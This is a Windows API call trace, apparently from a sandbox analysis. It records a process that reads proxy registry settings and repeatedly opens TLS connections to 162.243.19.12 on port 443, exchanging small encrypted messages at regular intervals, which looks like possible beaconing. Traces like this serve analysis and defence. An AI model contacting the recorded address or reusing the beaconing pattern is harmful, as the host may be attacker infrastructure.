	[0354.840] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa5c) returned 0x0
	[0354.840] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xe4
	[0354.840] RegNotifyChangeKeyValue (hKey=0xa5c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xe4, fAsynchronous=1) returned 0x0
	[0354.841] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0x25c) returned 1
	[0354.841] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc688ec0
	[0354.842] WinHttpSetTimeouts (hInternet=0x233fc688ec0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0354.842] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0354.864] SetEvent (hEvent=0x6b4) returned 1
	[0354.866] select (in: nfds=0, readfds=0x233e48526b0, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e48526b0, writefds=0x0, exceptfds=0x0) returned 1
	[0354.867] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0354.870] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0354.873] shutdown (s=0x7cc, how=2) returned 0
	[0354.886] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0354.886] closesocket (s=0x7cc) returned 0
	[0354.887] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0354.888] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0xa70
	[0354.889] WSAConnect (in: s=0x7cc, name=0x233e4853e48*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0355.000] closesocket (s=0xa70) returned 0
	[0355.001] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e4850df0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e48546d0, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e48546d0, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0355.002] FreeContextBuffer (in: pvContextBuffer=0x233fc687730 | out: pvContextBuffer=0x233fc687730) returned 0x0
	[0355.034] send (in: s=0x7cc, buf=0x233e48547a0*, len=333, flags=0 | out: buf=0x233e48547a0*) returned 333
	[0355.035] recv (in: s=0x7cc, buf=0x233e48547a0, len=5, flags=0 | out: buf=0x233e48547a0*) returned 5
	[0355.140] recv (in: s=0x7cc, buf=0x233e48547a5, len=49, flags=0 | out: buf=0x233e48547a5*) returned 49
	[0355.141] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e4850df0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e48549e0, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e4854a00, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e4854a00, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0355.141] recv (in: s=0x7cc, buf=0x233e4854af0, len=5, flags=0 | out: buf=0x233e4854af0*) returned 5
	[0355.141] recv (in: s=0x7cc, buf=0x233e4854b15, len=1, flags=0 | out: buf=0x233e4854b15*) returned 1
	[0355.141] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e4850df0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4854be8, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e4854c08, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e4854c08, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0355.142] recv (in: s=0x7cc, buf=0x233e4854cf8, len=5, flags=0 | out: buf=0x233e4854cf8*) returned 5
	[0355.142] recv (in: s=0x7cc, buf=0x233e4854d1d, len=48, flags=0 | out: buf=0x233e4854d1d*) returned 48
	[0355.143] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e4850df0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e4854e20, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e4854e40, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e4854e40, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x0
	[0355.144] FreeContextBuffer (in: pvContextBuffer=0x233e399bc20 | out: pvContextBuffer=0x233e399bc20) returned 0x0
	[0355.144] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x4, pBuffer=0x233e4854f88 | out: pBuffer=0x233e4854f88) returned 0x0
	[0355.145] QueryContextAttributesW (in: phContext=0x350199b610, ulAttribute=0x5a, pBuffer=0x233e4854fe0 | out: pBuffer=0x233e4854fe0) returned 0x0
	[0355.145] QueryContextAttributesW (in: phContext=0x350199b4c0, ulAttribute=0x53, pBuffer=0x233e4855048 | out: pBuffer=0x233e4855048) returned 0x0
	[0355.146] CertDuplicateCertificateContext (pCertContext=0x233fc680530) returned 0x233fc680530
	[0355.147] CertDuplicateStore (hCertStore=0x233fc6834f0) returned 0x233fc6834f0
	[0355.147] CertEnumCertificatesInStore (hCertStore=0x233fc6834f0, pPrevCertContext=0x0) returned 0x233fc680530
	[0355.147] CertDuplicateCertificateContext (pCertContext=0x233fc680530) returned 0x233fc680530
	[0355.147] CertEnumCertificatesInStore (hCertStore=0x233fc6834f0, pPrevCertContext=0x233fc680530) returned 0x0
	[0355.147] CertCloseStore (hCertStore=0x233fc6834f0, dwFlags=0x0) returned 1
	[0355.147] CertFreeCertificateContext (pCertContext=0x233fc680530) returned 1
	[0355.148] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc682cd0
	[0355.148] CertAddCRLLinkToStore (in: hCertStore=0x233fc682cd0, pCrlContext=0x233fc680530, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0355.148] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc680530, pTime=0x350199b4c8, hAdditionalStore=0x233fc682cd0, pChainPara=0x350199b4d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b4c0 | out: ppChainContext=0x350199b4c0) returned 1
	[0355.150] CertDuplicateCertificateChain (pChainContext=0x233fc6fe810) returned 0x233fc6fe810
	[0355.152] CertDuplicateCertificateContext (pCertContext=0x233fc680530) returned 0x233fc680530
	[0355.153] CertDuplicateCertificateContext (pCertContext=0x233fc67ff30) returned 0x233fc67ff30
	[0355.154] CertDuplicateCertificateContext (pCertContext=0x233fc680030) returned 0x233fc680030
	[0355.154] CertFreeCertificateChain (pChainContext=0x233fc6fe810) 
	[0355.154] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233fc6fe810, pPolicyPara=0x350199b648, pPolicyStatus=0x350199b628 | out: pPolicyStatus=0x350199b628) returned 1
	[0355.154] SetLastError (dwErrCode=0x0) 
	[0355.154] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233fc6fe810, pPolicyPara=0x350199b720, pPolicyStatus=0x350199b708 | out: pPolicyStatus=0x350199b708) returned 1
	[0355.155] CertFreeCertificateChain (pChainContext=0x233fc6fe810) 
	[0355.155] CertFreeCertificateContext (pCertContext=0x233fc680530) returned 1
	[0355.155] EncryptMessage (in: phContext=0x350199b900, fQOP=0x0, pMessage=0x233e4857c50, MessageSeqNo=0x0 | out: pMessage=0x233e4857c50) returned 0x0
	[0355.155] CoTaskMemAlloc (cb=0x20) returned 0x233fc6503b0
	[0355.155] WSASend (in: s=0x7cc, lpBuffers=0x233fc6503b0*=((len=0x3b, buf=0x233e4854f10*), (len=0xd5, buf=0x233e4857a58*)), dwBufferCount=0x2, lpNumberOfBytesSent=0x350199ba68, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x233fc6503b0*=((len=0x3b, buf=0x233e4854f10*), (len=0xd5, buf=0x233e4857a58*)), lpNumberOfBytesSent=0x350199ba68*=0x110, lpOverlapped=0x0) returned 0
	[0355.156] CoTaskMemFree (pv=0x233fc6503b0) 
	[0355.156] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0355.156] recv (in: s=0x7cc, buf=0x233e4857df8, len=5, flags=0 | out: buf=0x233e4857df8*) returned 5
	[0355.647] recv (in: s=0x7cc, buf=0x233e4857e1d, len=1488, flags=0 | out: buf=0x233e4857e1d*) returned 1488
	[0355.647] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e4858500, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e4858500, pfQOP=0x0) returned 0x0
	[0355.647] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0355.648] SetEvent (hEvent=0x6b4) returned 1
	[0355.676] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x394
	[0359.677] CloseHandle (hObject=0x394) returned 1
	[0359.747] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0x394) returned 0x0
	[0359.748] RegOpenKeyExW (in: hKey=0x394, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0x164) returned 0x0
	[0359.748] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa64
	[0359.748] RegNotifyChangeKeyValue (hKey=0x164, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa64, fAsynchronous=1) returned 0x0
	[0359.749] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0x3c4) returned 0x0
	[0359.749] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa80
	[0359.749] RegNotifyChangeKeyValue (hKey=0x3c4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xa80, fAsynchronous=1) returned 0x0
	[0359.749] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa5c) returned 0x0
	[0359.750] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xe4
	[0359.750] RegNotifyChangeKeyValue (hKey=0xa5c, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xe4, fAsynchronous=1) returned 0x0
	[0359.750] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0x25c) returned 1
	[0359.751] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc68b720
	[0359.751] WinHttpSetTimeouts (hInternet=0x233fc68b720, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0359.751] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0359.760] SetEvent (hEvent=0x6b4) returned 1
	[0359.760] select (in: nfds=0, readfds=0x233e485fef8, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e485fef8, writefds=0x0, exceptfds=0x0) returned 0
	[0359.760] EncryptMessage (in: phContext=0x350199bba0, fQOP=0x0, pMessage=0x233e4860490, MessageSeqNo=0x0 | out: pMessage=0x233e4860490) returned 0x0
	[0359.761] send (in: s=0x7cc, buf=0x233e4860298*, len=213, flags=0 | out: buf=0x233e4860298*) returned 213
	[0359.761] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0359.762] recv (in: s=0x7cc, buf=0x233e470ff30, len=5, flags=0 | out: buf=0x233e470ff30*) returned 5
	[0360.251] recv (in: s=0x7cc, buf=0x233e470ff35, len=1488, flags=0 | out: buf=0x233e470ff35*) returned 1488
	[0360.252] DecryptMessage (in: phContext=0x350199b760, pMessage=0x233e4860680, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e4860680, pfQOP=0x0) returned 0x0
	[0360.252] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0360.253] SetEvent (hEvent=0x6b4) returned 1
	[0360.271] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c
	[0374.277] CloseHandle (hObject=0x25c) returned 1
	[0374.595] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0x25c) returned 0x0
	[0374.596] RegOpenKeyExW (in: hKey=0x25c, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0xe4) returned 0x0
	[0374.596] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x270
	[0374.596] RegNotifyChangeKeyValue (hKey=0xe4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x270, fAsynchronous=1) returned 0x0
	[0374.598] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0x394) returned 0x0
	[0374.598] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x164
	[0374.598] RegNotifyChangeKeyValue (hKey=0x394, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x164, fAsynchronous=1) returned 0x0
	[0374.600] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0xa64) returned 0x0
	[0374.600] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3c4
	[0374.600] RegNotifyChangeKeyValue (hKey=0xa64, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x3c4, fAsynchronous=1) returned 0x0
	[0374.600] GetCurrentProcess () returned 0xffffffffffffffff
	[0374.600] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x350199c278 | out: TokenHandle=0x350199c278*=0xa80) returned 1
	[0374.601] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x233fc68b720
	[0374.602] WinHttpSetTimeouts (hInternet=0x233fc68b720, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0374.602] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x350199c358 | out: pProxyConfig=0x350199c358) returned 1
	[0374.623] SetEvent (hEvent=0x6b4) returned 1
	[0374.624] select (in: nfds=0, readfds=0x233e486a1d0, writefds=0x0, exceptfds=0x0, timeout=0x350199c010 | out: readfds=0x233e486a1d0, writefds=0x0, exceptfds=0x0) returned 1
	[0374.625] QueryContextAttributesW (in: phContext=0x350199bea0, ulAttribute=0x1a, pBuffer=0x350199c020 | out: pBuffer=0x350199c020) returned 0x0
	[0374.627] DeleteSecurityContext (phContext=0x350199b670) returned 0x0
	[0374.630] shutdown (s=0x7cc, how=2) returned 0
	[0374.631] setsockopt (s=0x7cc, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0374.632] closesocket (s=0x7cc) returned 0
	[0374.633] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7cc
	[0374.634] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0xa70
	[0374.634] WSAConnect (in: s=0x7cc, name=0x233e486b968*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0374.743] closesocket (s=0xa70) returned 0
	[0374.744] InitializeSecurityContextW (in: phCredential=0x350199b600, phContext=0x0, pTargetName=0x233e4868910, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x350199b5f0, pOutput=0x233e486c1f0, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0 | out: phNewContext=0x350199b5f0, pOutput=0x233e486c1f0, pfContextAttr=0x350199b5e8, ptsExpiry=0x350199b5e0) returned 0x90312
	[0374.746] FreeContextBuffer (in: pvContextBuffer=0x233fc687fd0 | out: pvContextBuffer=0x233fc687fd0) returned 0x0
	[0374.746] send (in: s=0x7cc, buf=0x233e486c2c0*, len=333, flags=0 | out: buf=0x233e486c2c0*) returned 333
	[0374.746] recv (in: s=0x7cc, buf=0x233e486c2c0, len=5, flags=0 | out: buf=0x233e486c2c0*) returned 5
	[0374.858] recv (in: s=0x7cc, buf=0x233e486c2c5, len=61, flags=0 | out: buf=0x233e486c2c5*) returned 61
	[0374.859] InitializeSecurityContextW (in: phCredential=0x350199b530, phContext=0x350199b7e0, pTargetName=0x233e4868910, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e486c500, Reserved2=0x0, phNewContext=0x350199b520, pOutput=0x233e486c520, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510 | out: phNewContext=0x350199b520, pOutput=0x233e486c520, pfContextAttr=0x350199b518, ptsExpiry=0x350199b510) returned 0x90312
	[0374.860] recv (in: s=0x7cc, buf=0x233e486c610, len=5, flags=0 | out: buf=0x233e486c610*) returned 5
	[0374.860] recv (in: s=0x7cc, buf=0x233e486c635, len=1575, flags=0 | out: buf=0x233e486c635*) returned 1575
	[0374.860] InitializeSecurityContextW (in: phCredential=0x350199b470, phContext=0x350199b720, pTargetName=0x233e4868910, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e486cd30, Reserved2=0x0, phNewContext=0x350199b460, pOutput=0x233e486cd50, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450 | out: phNewContext=0x350199b460, pOutput=0x233e486cd50, pfContextAttr=0x350199b458, ptsExpiry=0x350199b450) returned 0x90312
	[0374.862] recv (in: s=0x7cc, buf=0x233e486ce40, len=5, flags=0 | out: buf=0x233e486ce40*) returned 5
	[0374.862] recv (in: s=0x7cc, buf=0x233e486ce65, len=331, flags=0 | out: buf=0x233e486ce65*) returned 331
	[0374.862] InitializeSecurityContextW (in: phCredential=0x350199b3b0, phContext=0x350199b660, pTargetName=0x233e4868910, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e486d080, Reserved2=0x0, phNewContext=0x350199b3a0, pOutput=0x233e486d0a0, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390 | out: phNewContext=0x350199b3a0, pOutput=0x233e486d0a0, pfContextAttr=0x350199b398, ptsExpiry=0x350199b390) returned 0x90312
	[0374.863] recv (in: s=0x7cc, buf=0x233e486d190, len=5, flags=0 | out: buf=0x233e486d190*) returned 5
	[0374.863] recv (in: s=0x7cc, buf=0x233e486d1b5, len=4, flags=0 | out: buf=0x233e486d1b5*) returned 4
	[0374.863] InitializeSecurityContextW (in: phCredential=0x350199b2f0, phContext=0x350199b5a0, pTargetName=0x233e4868910, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e486d290, Reserved2=0x0, phNewContext=0x350199b2e0, pOutput=0x233e486d2b0, pfContextAttr=0x350199b2d8, ptsExpiry=0x350199b2d0 | out: phNewContext=0x350199b2e0, pOutput=0x233e486d2b0, pfContextAttr=0x350199b2d8, ptsExpiry=0x350199b2d0) returned 0x90312
	[0374.875] FreeContextBuffer (in: pvContextBuffer=0x233e39a6fc0 | out: pvContextBuffer=0x233e39a6fc0) returned 0x0
	[0374.875] send (in: s=0x7cc, buf=0x233e486d380*, len=134, flags=0 | out: buf=0x233e486d380*) returned 134
	[0374.875] recv (in: s=0x7cc, buf=0x233e486d380, len=5, flags=0 | out: buf=0x233e486d380*) returned 5
	[0374.988] recv (in: s=0x7cc, buf=0x233e486d445, len=218, flags=0 | out: buf=0x233e486d445*) returned 218
	[0374.988] InitializeSecurityContextW (in: phCredential=0x350199b230, phContext=0x350199b4e0, pTargetName=0x233e4868910, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e486d5f0, Reserved2=0x0, phNewContext=0x350199b220, pOutput=0x233e486d610, pfContextAttr=0x350199b218, ptsExpiry=0x350199b210 | out: phNewContext=0x350199b220, pOutput=0x233e486d610, pfContextAttr=0x350199b218, ptsExpiry=0x350199b210) returned 0x90312
	[0374.988] recv (in: s=0x7cc, buf=0x233e486d700, len=5, flags=0 | out: buf=0x233e486d700*) returned 5
	[0374.988] recv (in: s=0x7cc, buf=0x233e486d725, len=1, flags=0 | out: buf=0x233e486d725*) returned 1
	[0374.988] InitializeSecurityContextW (in: phCredential=0x350199b170, phContext=0x350199b420, pTargetName=0x233e4868910, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e486d7f8, Reserved2=0x0, phNewContext=0x350199b160, pOutput=0x233e486d818, pfContextAttr=0x350199b158, ptsExpiry=0x350199b150 | out: phNewContext=0x350199b160, pOutput=0x233e486d818, pfContextAttr=0x350199b158, ptsExpiry=0x350199b150) returned 0x90312
	[0374.988] recv (in: s=0x7cc, buf=0x233e486d908, len=5, flags=0 | out: buf=0x233e486d908*) returned 5
	[0374.988] recv (in: s=0x7cc, buf=0x233e486d92d, len=48, flags=0 | out: buf=0x233e486d92d*) returned 48
	[0374.988] InitializeSecurityContextW (in: phCredential=0x350199b0b0, phContext=0x350199b360, pTargetName=0x233e4868910, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x233e486da30, Reserved2=0x0, phNewContext=0x350199b0a0, pOutput=0x233e486da50, pfContextAttr=0x350199b098, ptsExpiry=0x350199b090 | out: phNewContext=0x350199b0a0, pOutput=0x233e486da50, pfContextAttr=0x350199b098, ptsExpiry=0x350199b090) returned 0x0
	[0374.989] QueryContextAttributesW (in: phContext=0x350199b310, ulAttribute=0x4, pBuffer=0x233e486db40 | out: pBuffer=0x233e486db40) returned 0x0
	[0374.990] QueryContextAttributesW (in: phContext=0x350199b310, ulAttribute=0x5a, pBuffer=0x233e486db98 | out: pBuffer=0x233e486db98) returned 0x0
	[0374.995] QueryContextAttributesW (in: phContext=0x350199b1c0, ulAttribute=0x53, pBuffer=0x233e486dc00 | out: pBuffer=0x233e486dc00) returned 0x0
	[0374.995] CertDuplicateCertificateContext (pCertContext=0x233fc67f430) returned 0x233fc67f430
	[0374.996] CertDuplicateStore (hCertStore=0x233fc683350) returned 0x233fc683350
	[0374.996] CertEnumCertificatesInStore (hCertStore=0x233fc683350, pPrevCertContext=0x0) returned 0x233fc67f430
	[0374.996] CertDuplicateCertificateContext (pCertContext=0x233fc67f430) returned 0x233fc67f430
	[0374.996] CertEnumCertificatesInStore (hCertStore=0x233fc683350, pPrevCertContext=0x233fc67f430) returned 0x0
	[0374.997] CertCloseStore (hCertStore=0x233fc683350, dwFlags=0x0) returned 1
	[0374.997] CertFreeCertificateContext (pCertContext=0x233fc67f430) returned 1
	[0374.999] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x233fc683760
	[0374.999] CertAddCRLLinkToStore (in: hCertStore=0x233fc683760, pCrlContext=0x233fc67f430, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0374.999] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x233fc67f430, pTime=0x350199b1c8, hAdditionalStore=0x233fc683760, pChainPara=0x350199b1d0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x350199b1c0 | out: ppChainContext=0x350199b1c0) returned 1
	[0375.002] CertDuplicateCertificateChain (pChainContext=0x233fc6fe810) returned 0x233fc6fe810
	[0375.027] CertDuplicateCertificateContext (pCertContext=0x233fc67f430) returned 0x233fc67f430
	[0375.028] CertDuplicateCertificateContext (pCertContext=0x233fc67ff30) returned 0x233fc67ff30
	[0375.028] CertDuplicateCertificateContext (pCertContext=0x233fc680030) returned 0x233fc680030
	[0375.029] CertFreeCertificateChain (pChainContext=0x233fc6fe810) 
	[0375.029] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x233fc6fe810, pPolicyPara=0x350199b348, pPolicyStatus=0x350199b328 | out: pPolicyStatus=0x350199b328) returned 1
	[0375.029] SetLastError (dwErrCode=0x0) 
	[0375.029] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x233fc6fe810, pPolicyPara=0x350199b420, pPolicyStatus=0x350199b408 | out: pPolicyStatus=0x350199b408) returned 1
	[0375.031] CertFreeCertificateChain (pChainContext=0x233fc6fe810) 
	[0375.031] CertFreeCertificateContext (pCertContext=0x233fc67f430) returned 1
	[0375.032] EncryptMessage (in: phContext=0x350199ba30, fQOP=0x0, pMessage=0x233e4870798, MessageSeqNo=0x0 | out: pMessage=0x233e4870798) returned 0x0
	[0375.032] send (in: s=0x7cc, buf=0x233e48705a0*, len=213, flags=0 | out: buf=0x233e48705a0*) returned 213
	[0375.032] setsockopt (s=0x7cc, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0375.032] recv (in: s=0x7cc, buf=0x233e4870890, len=5, flags=0 | out: buf=0x233e4870890*) returned 5
	[0375.557] recv (in: s=0x7cc, buf=0x233e48708b5, len=1488, flags=0 | out: buf=0x233e48708b5*) returned 1488
	[0375.557] DecryptMessage (in: phContext=0x350199b5f0, pMessage=0x233e4870f98, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x233e4870f98, pfQOP=0x0) returned 0x0
	[0375.558] setsockopt (s=0x7cc, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0375.558] SetEvent (hEvent=0x6b4) returned 1
	[0375.569] RtlLookupFunctionEntry (in: ControlPc=0x7ffbf5dfc96f, ImageBase=0x350199b270, HistoryTable=0x0 | out: ImageBase=0x350199b270, HistoryTable=0x0) returned 0x7ffbf6109a9c
	[0375.592] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x25c
	[0396.594] CloseHandle (hObject=0x25c) returned 1
	[0396.843] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x350199c400 | out: phkResult=0x350199c400*=0x25c) returned 0x0
	[0396.843] RegOpenKeyExW (in: hKey=0x25c, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c2e8 | out: phkResult=0x350199c2e8*=0xe4) returned 0x0
	[0396.843] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x270
	[0396.843] RegNotifyChangeKeyValue (hKey=0xe4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x270, fAsynchronous=1) returned 0x0
	[0396.843] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x350199c310 | out: phkResult=0x350199c310*=0x394) returned 0x0
	[0396.844] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x164
	[0396.844] RegNotifyChangeKeyValue (hKey=0x394, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x164, fAsynchronous=1) returned 0x0
